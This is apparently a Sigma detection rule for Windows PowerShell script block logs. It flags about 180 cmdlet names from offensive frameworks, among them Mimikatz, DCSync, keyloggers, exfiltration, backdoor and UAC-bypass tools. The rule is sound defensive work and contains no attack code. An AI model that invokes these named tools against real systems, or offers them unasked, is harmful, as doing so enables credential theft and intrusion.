title: Malicious PowerShell Commandlets id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 status: experimental description: Detects Commandlet names from well-known PowerShell exploitation frameworks references: - https://adsecurity.org/?p=2921 - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1 - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 author: Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update) date: 2017/03/05 modified: 2022/10/28 tags: - attack.execution - attack.t1059.001 logsource: product: windows category: ps_script definition: Script Block Logging must be enabled detection: select_Malicious: ScriptBlockText|contains: - 'Invoke-DllInjection' - 'Invoke-Shellcode' - 'Invoke-WmiCommand' - 'Get-GPPPassword' - 'Get-Keystrokes' - 'Get-TimedScreenshot' - 'Get-VaultCredential' - 'Invoke-CredentialInjection' - 'Invoke-Mimikatz' - 'Invoke-NinjaCopy' - 'Invoke-TokenManipulation' - 'Out-Minidump' - 'VolumeShadowCopyTools' - 'Invoke-ReflectivePEInjection' - 'Invoke-UserHunter' - 'Find-GPOLocation' - 'Invoke-ACLScanner' - 'Invoke-DowngradeAccount' - 'Get-ServiceUnquoted' - 'Get-ServiceFilePermission' - 'Get-ServicePermission' - 'Invoke-ServiceAbuse' - 'Install-ServiceBinary' - 'Get-RegAutoLogon' - 'Get-VulnAutoRun' - 'Get-VulnSchTask' - 'Get-UnattendedInstallFile' - 'Get-ApplicationHost' - 'Get-RegAlwaysInstallElevated' - 'Get-Unconstrained' - 'Add-RegBackdoor' - 'Add-ScrnSaveBackdoor' - 'Gupt-Backdoor' - 'Invoke-ADSBackdoor' - 'Enabled-DuplicateToken' - 'Invoke-PsUaCme' - 'Remove-Update' - 'Check-VM' - 'Get-LSASecret' - 'Get-PassHashes' - 'Show-TargetScreen' - 'Port-Scan' - 'Invoke-PoshRatHttp' - 'Invoke-PowerShellTCP' - 'Invoke-PowerShellWMI' - 'Add-Exfiltration' - 'Add-Persistence' - 'Do-Exfiltration' - 'Start-CaptureServer' - 'Get-ChromeDump' - 'Get-ClipboardContents' - 'Get-FoxDump' - 'Get-IndexedItem' - 'Get-Screenshot' - 'Invoke-Inveigh' - 'Invoke-NetRipper' - 'Invoke-EgressCheck' - 'Invoke-PostExfil' - 'Invoke-PSInject' - 'Invoke-RunAs' - 'MailRaider' - 'New-HoneyHash' - 'Set-MacAttribute' - 'Invoke-DCSync' - 'Invoke-PowerDump' - 'Exploit-Jboss' - 'Invoke-ThunderStruck' - 'Invoke-VoiceTroll' - 'Set-Wallpaper' - 'Invoke-InveighRelay' - 'Invoke-PsExec' - 'Invoke-SSHCommand' - 'Get-SecurityPackages' - 'Install-SSP' - 'Invoke-BackdoorLNK' - 'PowerBreach' - 'Get-SiteListPassword' - 'Get-System' - 'Invoke-BypassUAC' - 'Invoke-Tater' - 'Invoke-WScriptBypassUAC' - 'PowerUp' - 'PowerView' - 'Get-RickAstley' - 'Find-Fruit' - 'HTTP-Login' - 'Find-TrustedDocuments' - 'Invoke-Paranoia' - 'Invoke-WinEnum' - 'Invoke-ARPScan' - 'Invoke-PortScan' - 'Invoke-ReverseDNSLookup' - 'Invoke-SMBScanner' - 'Invoke-Mimikittenz' - 'Invoke-AllChecks' - 'Invoke-BadPotato' - 'Invoke-BetterSafetyKatz' - 'Invoke-Carbuncle' - 'Invoke-Certify' - 'Invoke-DAFT' - 'Invoke-DinvokeKatz' - 'Invoke-Eyewitness' - 'Invoke-FakeLogonScreen' - 'Invoke-Farmer' - 'Invoke-Get-RBCD-Threaded' - 'Invoke-Gopher' - 'Invoke-Grouper2' - 'Invoke-HandleKatz' - 'Invoke-Internalmonologue' - 'Invoke-KrbRelayUp' - 'Invoke-LdapSignCheck' - 'Invoke-Lockless' - 'Invoke-MITM6' - 'Invoke-NanoDump' - 'Invoke-OxidResolver' - 'Invoke-P0wnedshell' - 'Invoke-PPLDump' - 'Invoke-Rubeus' - 'Invoke-SCShell' - 'Invoke-SafetyKatz' - 'Invoke-SauronEye' - 'Invoke-Seatbelt' - 'Invoke-SharPersist' - 'Invoke-SharpAllowedToAct' - 'Invoke-SharpBlock' - 'Invoke-SharpBypassUAC' - 'Invoke-SharpChromium' - 'Invoke-SharpClipboard' - 'Invoke-SharpCloud' - 'Invoke-SharpDPAPI' - 'Invoke-SharpDump' - 'Invoke-SharpGPO-RemoteAccessPolicies' - 'Invoke-SharpGPOAbuse' - 'Invoke-SharpHandler' - 'Invoke-SharpHide' - 'Invoke-SharpHound4' - 'Invoke-SharpImpersonation' - 'Invoke-SharpImpersonationNoSpace' - 'Invoke-SharpKatz' - 'Invoke-SharpLdapRelayScan' - 'Invoke-SharpLoginPrompt' - 'Invoke-SharpMove' - 'Invoke-SharpPrintNightmare' - 'Invoke-SharpPrinter' - 'Invoke-SharpRDP' - 'Invoke-SharpSSDP' - 'Invoke-SharpSecDump' - 'Invoke-SharpSniper' - 'Invoke-SharpSploit' - 'Invoke-SharpSpray' - 'Invoke-SharpStay' - 'Invoke-SharpUp' - 'Invoke-SharpWatson' - 'Invoke-Sharphound2' - 'Invoke-Sharphound3' - 'Invoke-Sharplocker' - 'Invoke-Sharpshares' - 'Invoke-Sharpview' - 'Invoke-Sharpweb' - 'Invoke-Snaffler' - 'Invoke-Spoolsample' - 'Invoke-StandIn' - 'Invoke-StickyNotesExtract' - 'Invoke-Thunderfox' - 'Invoke-Tokenvator' - 'Invoke-UrbanBishop' - 'Invoke-Whisker' - 'Invoke-WireTap' - 'Invoke-winPEAS' - 'Invoke-Zerologon' - 'Get-USBKeystrokes' - 'Start-WebcamRecorder' - 'Invoke-OfficeScrape' - 'Invoke-DomainPasswordSpray' - 'Invoke-SpraySinglePassword' false_positive1: ScriptBlockText|contains: - Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1 - C:\ProgramData\Amazon\EC2-Windows\Launch\Module\ # false positive form Amazon EC2 false_positive2: ScriptBlockText|startswith: '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved' condition: select_Malicious and not 1 of false_positive* falsepositives: - Unknown level: high